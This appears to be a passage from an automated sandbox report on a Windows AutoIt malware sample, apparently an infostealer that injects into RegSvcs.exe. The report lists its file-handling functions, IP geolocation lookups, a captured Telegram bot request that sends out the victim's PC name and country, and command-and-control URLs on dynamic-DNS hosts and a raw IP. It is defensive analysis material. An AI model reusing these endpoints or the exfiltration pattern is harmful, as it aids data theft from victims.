Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, |
0_2_00452492 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00442886 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, |
0_2_004788BD |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, |
0_2_004339B6 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, |
0_2_0045CAFA |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00431A86 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, |
0_2_0044BD27 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0045DE8F FindFirstFileW,FindClose, |
0_2_0045DE8F |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0044BF8B |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, |
6_2_00452492 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
6_2_00442886 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, |
6_2_004788BD |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, |
6_2_004339B6 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, |
6_2_0045CAFA |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
6_2_00431A86 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, |
6_2_0044BD27 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0045DE8F FindFirstFileW,FindClose, |
6_2_0045DE8F |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, |
6_2_0044BF8B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 02B1F8E9h |
3_2_02B1F644 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 02B1FD41h |
3_2_02B1FA88 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665E959h |
3_2_0665E6B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 066531E0h |
3_2_06652DC8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 06650D0Dh |
3_2_06650B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 06651697h |
3_2_06650B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 06652C19h |
3_2_06652968 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
3_2_06650673 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665E0A9h |
3_2_0665DE00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665F209h |
3_2_0665EF60 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665CF49h |
3_2_0665CCA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665D7F9h |
3_2_0665D550 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 066531E0h |
3_2_06652DBF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665E501h |
3_2_0665E258 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665EDB1h |
3_2_0665EB08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665F661h |
3_2_0665F3B8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
3_2_06650040 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
3_2_06650853 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665FAB9h |
3_2_0665F810 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665D3A1h |
3_2_0665D0F8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 066531E0h |
3_2_0665310E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0665DC51h |
3_2_0665D9A8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0084F8E9h |
7_2_0084F631 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 0084FD41h |
7_2_0084FA88 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DB31E0h |
7_2_05DB2DC8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DB2C19h |
7_2_05DB2968 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DB0D0Dh |
7_2_05DB0B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DB1697h |
7_2_05DB0B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DB31E0h |
7_2_05DB2DBF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBD7F9h |
7_2_05DBD550 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBCF49h |
7_2_05DBCCA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBF209h |
7_2_05DBEF60 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBE959h |
7_2_05DBE6B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBE0A9h |
7_2_05DBDE00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBDC51h |
7_2_05DBD9A8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DB31E0h |
7_2_05DB310E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBD3A1h |
7_2_05DBD0F8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
7_2_05DB0040 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBFAB9h |
7_2_05DBF810 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBF661h |
7_2_05DBF3B8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBEDB1h |
7_2_05DBEB08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 4x nop then jmp 05DBE501h |
7_2_05DBE258 |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2025/09/2024%20/%2023:33:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2026/09/2024%20/%2002:40:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002DFA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.000000000269C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: name.exe, 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: name.exe, 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002521000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: name.exe, 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002521000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002521000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002521000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: name.exe, 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002521000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002DFA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.000000000269C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://us2.smtp.mailhostbox.com |
Source: name.exe, 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002521000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: RegSvcs.exe, 00000003.00000002.3797895688.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002604000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: name.exe, 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002604000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002604000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002604000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a |
Source: RegSvcs.exe, 00000003.00000002.3797895688.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: RegSvcs.exe, 00000003.00000002.3797895688.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: RegSvcs.exe, 00000003.00000002.3797895688.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: RegSvcs.exe, 00000007.00000002.3794455099.00000000026DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002710000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.00000000026DA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002604000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.000000000256E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.00000000025DE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: name.exe, 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.000000000256E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: RegSvcs.exe, 00000007.00000002.3794455099.0000000002598000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3794620104.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002604000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.00000000025DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002598000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: RegSvcs.exe, 00000003.00000002.3797895688.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: RegSvcs.exe, 00000007.00000002.3797631205.0000000003541000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: RegSvcs.exe, 00000007.00000002.3794455099.0000000002710000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.0000000002701000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: RegSvcs.exe, 00000003.00000002.3794620104.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794455099.000000000270B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lB |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49744 |
